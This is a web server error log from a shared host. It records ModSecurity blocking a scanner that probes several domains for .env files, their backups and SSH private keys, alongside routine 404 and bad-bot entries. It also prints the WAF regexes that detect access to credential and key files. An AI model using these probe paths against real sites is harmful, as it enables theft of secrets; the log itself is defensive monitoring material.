[Tue May 26 15:18:02.850251 2026] [security2:error] [pid 700087:tid 700219] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsUpPHQM4as9fEIIaW0AAAAAI"]
[Tue May 26 15:18:03.494792 2026] [security2:error] [pid 700087:tid 700281] [client 74.7.230.47:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.la10.cti.hn"] [uri "/cgi-sys/404.html"] [unique_id "ahVsU5PHQM4as9fEIIaW7wAAAEA"]
[Tue May 26 15:18:03.495362 2026] [security2:error] [pid 700087:tid 700301] [client 74.7.230.47:39418] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.la10.cti.hn"] [uri "/robots.txt"] [unique_id "ahVsU5PHQM4as9fEIIaW7QAAVEQ"]
[Tue May 26 15:18:03.894801 2026] [autoindex:error] [pid 700087:tid 700265] [client 74.7.243.227:0] AH01276: Cannot serve directory /home1/ctihnwtp/la10.hn/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:18:04.166968 2026] [security2:error] [pid 700087:tid 700325] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsU5PHQM4as9fEIIaW-AAAAGw"]
[Tue May 26 15:18:06.351735 2026] [security2:error] [pid 700087:tid 700261] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsVZPHQM4as9fEIIaXWQAAACw"]
[Tue May 26 15:18:06.571270 2026] [security2:error] [pid 700087:tid 700283] [client 5.255.121.183:47634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.gldmarsa.glorodavionics.com"] [uri "/.env.bak"] [unique_id "ahVsVpPHQM4as9fEIIaXcgAAAEI"]
[Tue May 26 15:18:06.575730 2026] [security2:error] [pid 700087:tid 700284] [client 5.255.121.183:47704] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gldmarsa.glorodavionics.com"] [uri "/backend/.env"] [unique_id "ahVsVpPHQM4as9fEIIaXegAAAEM"]
[Tue May 26 15:18:06.576030 2026] [security2:error] [pid 700087:tid 700312] [client 5.255.121.183:47618] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.gldmarsa.glorodavionics.com"] [uri "/.env.backup"] [unique_id "ahVsVpPHQM4as9fEIIaXeAAAAF8"]
[Tue May 26 15:18:06.576033 2026] [security2:error] [pid 700087:tid 700237] [client 5.255.121.183:47752] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "www.gldmarsa.glorodavionics.com"] [uri "/.ssh/id_dsa"] [unique_id "ahVsVpPHQM4as9fEIIaXdwAAABQ"]
[Tue May 26 15:18:06.577061 2026] [security2:error] [pid 700087:tid 700266] [client 5.255.121.183:47718] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gldmarsa.glorodavionics.com"] [uri "/app/.env"] [unique_id "ahVsVpPHQM4as9fEIIaXewAAADE"]
[Tue May 26 15:18:06.581085 2026] [security2:error] [pid 700087:tid 700244] [client 5.255.121.183:47734] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "www.gldmarsa.glorodavionics.com"] [uri "/.ssh/id_rsa"] [unique_id "ahVsVpPHQM4as9fEIIaXfwAAABs"]
[Tue May 26 15:18:06.585338 2026] [security2:error] [pid 700087:tid 700319] [client 5.255.121.183:47638] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.gldmarsa.glorodavionics.com"] [uri "/.env.old"] [unique_id "ahVsVpPHQM4as9fEIIaXgwAAAGY"]
[Tue May 26 15:18:07.854498 2026] [security2:error] [pid 700087:tid 700297] [client 5.255.121.183:47804] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gldmarsa.glorodavionics.com"] [uri "/public/.env"] [unique_id "ahVsV5PHQM4as9fEIIaXxQAAAFA"]
[Tue May 26 15:18:07.858777 2026] [security2:error] [pid 700087:tid 700315] [client 5.255.121.183:47752] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gldmarsa.glorodavionics.com"] [uri "/api/.env"] [unique_id "ahVsV5PHQM4as9fEIIaXzAAAAGI"]
[Tue May 26 15:18:07.859056 2026] [security2:error] [pid 700087:tid 700273] [client 5.255.121.183:47718] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gldmarsa.glorodavionics.com"] [uri "/.env"] [unique_id "ahVsV5PHQM4as9fEIIaXzQAAADg"]
[Tue May 26 15:18:09.011418 2026] [security2:error] [pid 700087:tid 700238] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsWJPHQM4as9fEIIaYLAAAABU"]
[Tue May 26 15:18:11.277799 2026] [security2:error] [pid 700087:tid 700226] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsWpPHQM4as9fEIIaYggAAAAk"]
[Tue May 26 15:18:12.247746 2026] [security2:error] [pid 700087:tid 700248] [client 114.119.159.148:39639] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "koneksi.com.co"] [uri "/blog/page/3"] [unique_id "ahVsXJPHQM4as9fEIIaYwAAAAB8"], referer: https://koneksi.com.co/blog/page/3
[Tue May 26 15:18:13.866405 2026] [autoindex:error] [pid 700087:tid 700225] [client 5.255.121.183:0] AH01276: Cannot serve directory /home2/glorolle/public_html/gldmarsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:18:14.532033 2026] [security2:error] [pid 700087:tid 700290] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsXpPHQM4as9fEIIaZFgAAAEk"]
[Tue May 26 15:18:15.797023 2026] [security2:error] [pid 700087:tid 700312] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsX5PHQM4as9fEIIaZPAAAAF8"]
[Tue May 26 15:18:17.084972 2026] [security2:error] [pid 700087:tid 700290] [client 43.172.194.192:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVsYJPHQM4as9fEIIaZjAAAAEk"]
[Tue May 26 15:18:17.101512 2026] [security2:error] [pid 700087:tid 700333] [client 43.173.182.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVsYJPHQM4as9fEIIaZjwAAAHQ"]
[Tue May 26 15:18:17.102978 2026] [security2:error] [pid 700087:tid 700309] [client 43.172.196.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVsYJPHQM4as9fEIIaZiwAAAFw"]
[Tue May 26 15:18:17.307997 2026] [security2:error] [pid 700087:tid 700311] [client 43.172.194.143:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVsYZPHQM4as9fEIIaZrgAAAF4"]
[Tue May 26 15:18:17.368057 2026] [security2:error] [pid 700087:tid 700288] [client 43.173.180.152:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVsYZPHQM4as9fEIIaZswAAAEc"]
[Tue May 26 15:18:17.904014 2026] [security2:error] [pid 700087:tid 700247] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsYZPHQM4as9fEIIaZvwAAAB4"]
[Tue May 26 15:18:19.013687 2026] [security2:error] [pid 700087:tid 700339] [client 192.241.222.196:39774] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/.env"] [unique_id "ahVsY5PHQM4as9fEIIaaGgAAAHo"]
[Tue May 26 15:18:19.806993 2026] [security2:error] [pid 700087:tid 700238] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsY5PHQM4as9fEIIaaKAAAABU"]
[Tue May 26 15:18:21.445651 2026] [security2:error] [pid 700087:tid 700320] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsZZPHQM4as9fEIIaabwAAAGc"]
[Tue May 26 15:18:22.001877 2026] [security2:error] [pid 700087:tid 700315] [client 114.119.137.103:29689] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.gciamd.org.in"] [uri "/robots.txt"] [unique_id "ahVsZpPHQM4as9fEIIaakwAAAGI"]
[Tue May 26 15:18:24.183968 2026] [security2:error] [pid 700087:tid 700252] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsZ5PHQM4as9fEIIaazQAAACM"]
[Tue May 26 15:18:25.774016 2026] [security2:error] [pid 700087:tid 700335] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsaZPHQM4as9fEIIabAAAAAHY"]
[Tue May 26 15:18:27.881673 2026] [security2:error] [pid 700087:tid 700273] [client 5.255.121.183:42906] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "glorodavionics.com"] [uri "/app/.env"] [unique_id "ahVsa5PHQM4as9fEIIabcwAAADg"]
[Tue May 26 15:18:27.882708 2026] [security2:error] [pid 700087:tid 700290] [client 5.255.121.183:42892] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "glorodavionics.com"] [uri "/backend/.env"] [unique_id "ahVsa5PHQM4as9fEIIabdwAAAEk"]
[Tue May 26 15:18:27.887067 2026] [security2:error] [pid 700087:tid 700336] [client 5.255.121.183:42922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "glorodavionics.com"] [uri "/.ssh/id_rsa"] [unique_id "ahVsa5PHQM4as9fEIIabeQAAAHc"]
[Tue May 26 15:18:27.888943 2026] [security2:error] [pid 700087:tid 700297] [client 5.255.121.183:42794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "glorodavionics.com"] [uri "/.env"] [unique_id "ahVsa5PHQM4as9fEIIabgQAAAFA"]
[Tue May 26 15:18:27.890072 2026] [security2:error] [pid 700087:tid 700316] [client 5.255.121.183:42950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "glorodavionics.com"] [uri "/.ssh/id_dsa"] [unique_id "ahVsa5PHQM4as9fEIIabiAAAAGM"]
[Tue May 26 15:18:27.892285 2026] [security2:error] [pid 700087:tid 700261] [client 5.255.121.183:42838] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "glorodavionics.com"] [uri "/.env.bak"] [unique_id "ahVsa5PHQM4as9fEIIabhQAAACw"]
[Tue May 26 15:18:28.010440 2026] [security2:error] [pid 700087:tid 700288] [client 123.21.163.234:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsa5PHQM4as9fEIIabZAAAAEc"]
[Tue May 26 15:18:28.163834 2026] [security2:error] [pid 700087:tid 700335] [client 5.255.121.183:43076] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "glorodavionics.com"] [uri "/api/.env"] [unique_id "ahVsbJPHQM4as9fEIIabxAAAAHY"]
[Tue May 26 15:18:28.168169 2026] [security2:error] [pid 700087:tid 700265] [client 5.255.121.183:42762] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "glorodavionics.com"] [uri "/public/.env"] [unique_id "ahVsbJPHQM4as9fEIIabxwAAADA"]
[Tue May 26 15:18:28.168601 2026] [security2:error] [pid 700087:tid 700249] [client 5.255.121.183:42868] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "glorodavionics.com"] [uri "/.env.old"] [unique_id "ahVsbJPHQM4as9fEIIabyQAAACA"]
[Tue May 26 15:18:28.171973 2026] [security2:error] [pid 700087:tid 700262] [client 5.255.121.183:42750] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "glorodavionics.com"] [uri "/.env.backup"] [unique_id "ahVsbJPHQM4as9fEIIabxgAAAC0"]
[Tue May 26 15:18:28.455899 2026] [security2:error] [pid 700087:tid 700253] [client 5.255.121.183:43274] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gldmarsa.com"] [uri "/.env"] [unique_id "ahVsbJPHQM4as9fEIIab8QAAACQ"]
[Tue May 26 15:18:28.456181 2026] [security2:error] [pid 700087:tid 700290] [client 5.255.121.183:43328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.gldmarsa.com"] [uri "/.env.bak"] [unique_id "ahVsbJPHQM4as9fEIIab7wAAAEk"]
[Tue May 26 15:18:28.457131 2026] [security2:error] [pid 700087:tid 700316] [client 5.255.121.183:43338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.gldmarsa.com"] [uri "/.env.old"] [unique_id "ahVsbJPHQM4as9fEIIab8gAAAGM"]
[Tue May 26 15:18:28.504468 2026] [security2:error] [pid 700087:tid 700286] [client 5.255.121.183:43416] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gldmarsa.com"] [uri "/backend/.env"] [unique_id "ahVsbJPHQM4as9fEIIacAAAAAEU"]
[Tue May 26 15:18:28.550551 2026] [security2:error] [pid 700087:tid 700231] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsbJPHQM4as9fEIIabwAAAAA4"]
[Tue May 26 15:18:28.727356 2026] [security2:error] [pid 700087:tid 700221] [client 5.255.121.183:43204] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.gldmarsa.com"] [uri "/.env.backup"] [unique_id "ahVsbJPHQM4as9fEIIacUgAAAAQ"]
